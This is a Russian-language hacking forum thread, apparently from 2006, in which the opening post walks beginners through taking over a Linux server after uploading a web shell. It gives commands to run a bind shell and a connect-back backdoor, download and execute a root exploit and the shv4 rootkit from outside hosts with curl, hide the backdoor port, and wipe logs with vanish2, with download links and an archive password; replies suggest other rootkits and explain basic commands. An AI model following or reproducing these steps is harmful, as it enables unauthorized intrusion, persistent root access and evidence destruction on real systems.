Решил написать статейку для расширения кругозора новичков античата в целом. Думаю, она многим понадобится и даст маленький толчок в дальнейшем развитии. Статья предназначена для тех, кто уже умеет заливать веб-шелл и ознакомлен со всеми его прелестями... Итак – мы залили шелл. Что же делать дальше? Отдаём первую команду: Code: uname –a Что же мы видим? Linux nalog.com 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux Ядро старо,как мир.Нашей задачей будет поднять свои привилегии до максимальных aka root.Описание взлома всех версий линуксов,фрях,ect описать не реально-так что в этой статье будем говорить исключительно о Linux 2.4.20-8. Погнали) Для начала проделаем следующие шаги: 1) Code: cd /tmp mkdir logs cd logs 2)Cливаем: bind.pl Code: chmod +x bind.pl perl bind.pl Запускаем: netcat – Code: nc sitename 32767 Где sitename -ваш сайт. При открытии окна командуем: id.Работает? Отлично) Но межет и не работать если фаер фильтрует соединение( Тогда скачиваем Connect-Back Backdoor (bd.c) Code: chmod +x bd.c gcc db.c –o bd После чего ставим netcat на прослушку 4000-ого порта: Code: -l –p 4000 И запускаем бекдор: Code: ./db 127.0.0.1 – Где 127.0.0.1 ваш реальный ip. И вот в окошке появилась надпись - Connected to CommandLine... Приступим к решительным действиям: Скачиваем сплойт для этой версии ядра-вполне должен подойти mremap_pte,но я советую воспользоваться xpl_brk ,т.к он меня редко подводил. Скачиваем уже cкомпилированный сплойт: Code: curl [url]http://xpl.netmisphere2.com/xpl_brk[/url] chmod +x xpl_brk ./ xpl_brk id [COLOR=Red]uid=0(root) gid=0(root)[/COLOR] Отлично.Мы добись того чего хотели,но это только пол дела. Надо закрепиться в системе для этого скачиваем руткит-возьмём shv4 Code: curl [url]http://splo1t.narod.ru/rootkits/shv4.tar.gz[/url] tar xzf shv4.tar.gz cd shv4 chmod +x setup ./setup pass 4321 *где pass(пароль) и 4321(порт) ваши значения. Во избежание проблем не советую вешать на высокий порт. Заходит в putty указываем сайт, порт и конектимся. Имя root,а пароль тот что вы указали при настройке. В моём случае это pass. Зашли? Выполняем команду: Code: nestat -an Как видите заданный порт не где не светится,а значит мы освободили себя от зоркого глаза админа Осталось, почистить логи. Скачиваем один из лучших клинеров под *nix -vanish2 Code: chmod +x vanish2. Собираем Code: gcc vanish2.c –o vanish Запускаем: Code: ./vanish root name_site 127.0.0.1 *Где 127.0.0.1 ваш реальный ip. Видим надпись: V_A_N_I_S_H_E_D_! Которая не может не радовать глаз. _ _ _ _ _ _ _ _ _ _ _ _ _ _ На этом моя статейка кончается-надеюсь она поможет новичкам... Ссылки: r57Shell: http://hcr.3dn.ru/expl/php/r57shell.txt Netcat:http://pro-hack.ru/download/s_nettools_2.html bind.pl: http://nsd.ru/soft/1/ano/bind.pl.txt Connect-Back Backdoor: http://desrow.narod.ru/www/bd.rar xpl_brk: http://desrow.narod.ru/exploits/xpl_brk.rar shv4: http://desrow.narod.ru/rootkits/shv4_.rar Putty: http://pro-hack.ru/download/s_nettools_4.html vanish2: http://nsd.ru/soft/1/anonimus/vanish2.tgz For any link pass:antichat =====[ Desr0w | | 12.04.2006 ]=====
ну так, опять ничего особенного для новичков пойдёт, но надо было бы расписать значение набранных команд... + всё же поставлю...
хмм статья конечно для новечков ничего, тока вот shv4 или 5 ставить не советую, так как он палит порт и легго пропаливается нмапом при сканировании. советую лучше suckit http://packetstormsecurity.org/UNIX/penetration/rootkits/sk-1.3a.tar.gz тока собирается он не всегда. или adore если есть шелл доступ http://www.eviltime.com/download_id.php?id=147 или смотрим руткиты на этой паге http://www.eviltime.com/download.php?page=hacking&subpage=rootkits
Ну я ж сказал для тех кто умеет юзать хотя бы веб-шелл.По идеи они должны знать эти команды. Ну мне не сложно: pwd Эта команда выводит на экран полный путь к текущему каталогу. В любой момент можно узнать где вы находитесь. ls Команда ls выводит список файлов и подкаталога. По умолчанию файлы начинающиеся с точки (.) скрываются. Чтобы их увидеть надо добавить ключ -a: ls -a Для полной инфы от папках и файлах и ссылках: ls -al Хотим просмотреть файлы в других дирах: Code: ls -al /tmp cd команда позволяет сменить текщий каталог: Code: cd /tmp/bbb и вы уже в папке bbb например в каталоге bbb есть подкаталог bb-перейдём в него. Code: cd bb Если нужно переместится на каталог выше: Code: cd .. mkdir Создание директории. Например: Code: mkdir antichat rm Удаление файлов. Для удаления директорий нужны след. ключи: -d -- удалить директорию. -r -- удалять содержимое директорий. -f --не спрашивать подтверждение на удаление. Code: rm -rf /tmp/bbb/antichat - так мы удалим дирикторию antichat. tar В никсах нет винрара Архивы поставляются в виде tar.gz Разархивируем: Code: tar xzvf namefile.tar.gz which Команда предназначена для того,чтобы узнать каталог в котором находится программа. Мы например узнаём какая качалка стоит на серве. Пример: Code: which ls /usr/bin/ls Ну вот вроде все команды использованные в статье. А..И еще немного о качалках: Самая распространенная -wget есть еще: curl fetch lynx links GET зы: uname -a показывает версию системы и еще кое что. id -показывает ваши права. hostname показывает имя сайта. есть ключ -i Code: hostname -i покажет ip данного сайта. The end.
Вот теперь всё на своих местах надеюсь не будет никаких глупых вопросов от нубов типа: "что такое ls, как разархивировать архив, как посмотреть открытые порты..." Из этой статьи больше понравилась часть про руткиты, хороший обзор, много интересного, побольше бы таких статей про sql, тогда бы было ВСЁ супер!
Скоро думаю написать про установку всего нужного софта и т.д. Мелочь конечно,но думаю после прочтения этой статьи и просмотра видео кому то понадобится... Естественно всё будет написано в жанре для новичков
Desr0w зачем делать так: cd /tmp mkdir logs cd logs если все можна в 1ну строку через ; далее chmod +x bind.pl perl bind.pl & chmod +x bd.c gcc db.c –o bd зачем??? ты знаешь значение +x ??? почитай маны по tar & hostname а курсы у тебя наверное не очень =) ps: статья отстой! даже для новичков! не в обиду брат!
Буду признателен,если мемберы/модеры поставят этому доброму человеку пару десятков минусов.Думаю есть за что.При -10 автобан работает? Не понимаю я таких людей: Вот я писал-старался...Всё оценили данную статью,как хороший мануал для новичков. Но вот появляется борзый новичёк и обсирает мою статью и меня.Зачем это человеку надо? Ну может он второй Кевин Митник или кто другой,если считает что эта статья плоха даже для новичков... своими словами обламываешь так? А может он просто набиваешь посты т.к кроме критики и мата нечего больше ответить. гг
